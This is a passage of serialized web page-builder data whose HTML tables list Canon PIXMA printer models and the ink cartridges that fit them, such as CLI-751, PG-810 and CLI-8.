width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td 